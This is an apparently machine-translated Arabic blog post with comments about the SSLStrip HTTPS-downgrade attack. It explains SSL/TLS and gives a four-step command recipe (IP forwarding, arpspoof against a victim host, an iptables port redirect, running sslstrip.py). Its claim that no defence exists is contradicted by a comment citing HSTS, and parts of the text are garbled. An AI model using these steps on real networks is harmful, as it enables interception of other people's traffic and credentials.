SSLStrip: التجسس على حركة مرور SSL

قدم Moxie Marlinspike في القبعة السوداء 2009 أداة أنيقة تسمى SSLStrip، موجه إلى جعل المستخدم يعتقد أنه موجود على موقع ويب به تشفير SSL بينما في الواقع يتم نقل جميع البيانات علانية. بالإضافة إلى ذلك ، يخدع SSLStrip خادم الويب ، الذي يتم تجاوز تشفيره المزعوم على الرغم من استمرار الموقع في التصرف كما لو كان يعمل.

بقدر ما استطعت اكتشاف ، لا تزال هذه الطريقة تعمل بشكل رائع. التهديد لا يزال قائما ونحن جميعا مكشوفون. الباحة ...

لنبدأ بالأساسيات: ما هي SSL؟

بالنسبة لأولئك الذين لا يعرفون ، طبقة مآخذ التوصيل الآمنة (SSL؛ بروتوكول طبقة مأخذ التوصيل الآمنة) وخليفته بروتوكول طبقة النقل الآمنة (TLS ؛ أمان طبقة النقل) بروتوكولات التشفير التي توفر اتصالات آمنة عبر الشبكة، عادة الإنترنت.

يعمل SSL على طبقة بين بروتوكولات التطبيق مثل HTTP و SMTP و NNTP وعبر بروتوكول نقل TCP ، وهو جزء من عائلة بروتوكولات TCP / IP. على الرغم من أنه يمكن أن يوفر الأمان لأي بروتوكول يستخدم اتصالات موثوقة (مثل TCP) ، إلا أنه يتم استخدامه في معظم الحالات مع HTTP لتكوين HTTPS. HTTPS يستخدم لتأمين صفحات الويب العالمية لتطبيقات الويب. التجارة الإلكترونية، باستخدام شهادات المفاتيح العامة للتحقق من هوية نقاط النهاية.

SSLStrip ... هل عادت الإباحية إلى Let's Use Linux؟

تشغيل SSLStrip انه بسيط استبدل جميع طلبات HTTPS لصفحة ويب بواسطة HTTP ثم تنفيذ هجوم MITM (هجوم «رجل في الأوسط«) بين الخادم والعميل. الفكرة هي أن الضحية والمهاجم يتواصلان عبر HTTP ، بينما يتواصل المهاجم والخادم عبر HTTPS بشهادة الخادم. وبالتالي ، يكون المهاجم قادرًا على رؤية كل حركة مرور النص العادي للضحية.

إليك مقطع فيديو حيث يمكننا أن نرى كيف تعمل هذه الأداة الممتازة.

كيفية استخدام SSLStrip

1.- تكوين IP Forwarding

صدى 1> / proc / sys / net / ipv4 / ip_forward

2.- تنفيذ هجوم ARP MITM بين الآلتين:

arpspoof -i eth0 -t مضيف الضحايا

3.- إعادة توجيه حركة المرور باستخدام iptables:

iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT –to-port 8080

4.- ابدأ SSLStrip على المنفذ المستخدم

ملف python sslstrip.py -w

كيف تحمي نفسك من هجمات SSLStrip؟

هذا هو أجمل وأروع: لا تستطيع.

كما يتضح من Moxie (صاحب الفيديو لا يتم إهدار أكثر من 69 دقيقة بقليل) الحل الوحيد المحتمل لكل هذا هو تشفير جميع اتصالات HTTP ، أي استبدال "HTTP" العام والوحشي في جميع حالاته بـ "HTTPS" ، بغض النظر عن الصفحة أو الخدمات. كما قالها Moxie ، "يعتبر البروتوكول الآمن الذي يعتمد على بروتوكول غير آمن مشكلة".

ما الذي يمكنك فعله كمستخدم على الأقل تقليل فرص التعرض للهجوم؟ تحقق بطريقة بجنون العظمة من وجود "https" أمام كل صفحة تم اختراقها ، أو في حالة تثبيت مستخدمي Firefox نوسكريبت وفرض اتصالات HTTPS في جميع الصفحات. ومع ذلك فإن هذا لن يؤدي إلا إلى تقليل التأثير وليس إلغائه.

مصدر: دراجونجار & موشي

شكرا لك فرانسيسكو لتزويدنا بالمعلومات!

اترك تعليقك

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها ب *

*

*

  1. المسؤول عن البيانات: ميغيل أنخيل جاتون
  2. الغرض من البيانات: التحكم في الرسائل الاقتحامية ، وإدارة التعليقات.
  3. الشرعية: موافقتك
  4. توصيل البيانات: لن يتم إرسال البيانات إلى أطراف ثالثة إلا بموجب التزام قانوني.
  5. تخزين البيانات: قاعدة البيانات التي تستضيفها شركة Occentus Networks (الاتحاد الأوروبي)
  6. الحقوق: يمكنك في أي وقت تقييد معلوماتك واستعادتها وحذفها.

  1.   جيدو اجناسيو اجناسيو قال

    مممم ... بخصوص https الذي يحميك من الاختصار ، فهو نسبي.

    لا أعرف إلى أي مدى لا تنجح هجمات mitm ضد اتصالات SSL ، تعمل هجمات mitm على طبقة الارتباط بينما ssl على طبقة النقل ، لذلك من الممكن التقاط البيانات.

    منذ وقت طويل ، كنت أقوم بإجراء اختبارات لدورة تدريبية قمت بها باستخدام برنامج MITM في شبكتي المحلية ، ومن الممكن أخذ البيانات المرسلة بواسطة SSL ، وتجربة hotmail (وهو SSL) وإرجاع المرور دون مشاكل. فقط فكر في أن المهاجم ينتحل شخصية البوابة ويتلقى جميع المعلومات من الضحية.

    الطريقة الوحيدة لمعرفة أن معلوماتك تنتقل بأمان هي باستخدام نفق ssh.

    ما أفعله إذا شعرت بالاضطهاد إلى حد ما هو الاتصال بالخادم الخاص بي باستخدام ssh ، والنفق عبر منفذ محلي ، وفتح المقابس واستخدام اتصال الإنترنت الخاص بي في المنزل للتنقل أثناء استخدام جهاز كمبيوتر شخص آخر.

    وكما قالوا ، لا توجد طريقة لتجنب هذا الهجوم ، باستثناء تأمين dhcp الخاص بنا بواسطة mac وتأمين من يتصل….

  2.   بابلورد قال

    مرحبًا ، في الأمر 4 كنت تفتقد "-l 8080"

  3.   لنستخدم لينكس قال

    حسنا. شكرا!

  4.   مارتن فارياس قال

    لكي تكون أكثر تحديدًا ، فإن النقطة التي لم يعد بإمكانك فيها حماية نفسك وقعت مرة واحدة في هجوم MitM. هناك طرق مختلفة لحماية نفسك من هذا الهجوم ، على الرغم من صعوبة ذلك لأنه يحتوي على متغيرات.

    تحرير:

    يستحق تحديث التعليق كل هذا العناء! اكتشفت أنه منذ يناير 2012 على الأقل ، يستخدم متصفحا chrome و Firefox (لن أتفاجأ إذا كانا جميعًا في هذه المرحلة) يستخدمان رؤوس HSTS. قال سعيد أن الرأس يحل مشكلة عدم الحصانة عن طريق إبلاغ المتصفح بأن "الاتصالات" يجب أن تستخدم دائمًا SSL بعد محاولة أولى واحدة للاتصال بالموقع (وهذا يحافظ على وجود الثغرة الأمنية إلى الحد الأدنى). علاوة على ذلك ، يزيد Chrome من مستوى الأمان عن طريق إضافة قائمة بمواقع HSTS (ربما تكون الأكثر شيوعًا على الويب). مصدر: http://forums.hak5.org/index.php?/topic/25322-sslstrip-not-working-with-gmail-twitter/

  5.   شركة HacKan & CuBa. قال

    جيد جدًا ، أعتقد أنه رائع جدًا. الفكرة حقا بسيطة 😀

  6.   لنستخدم لينكس قال

    هكذا…

  7.   شامبيرتوكس قال

    هل يعرف أي شخص ما إذا كان يمكن استخدام arpspoof عندما يكون لدينا أكثر من مضيف واحد على الشبكة؟ شكرا.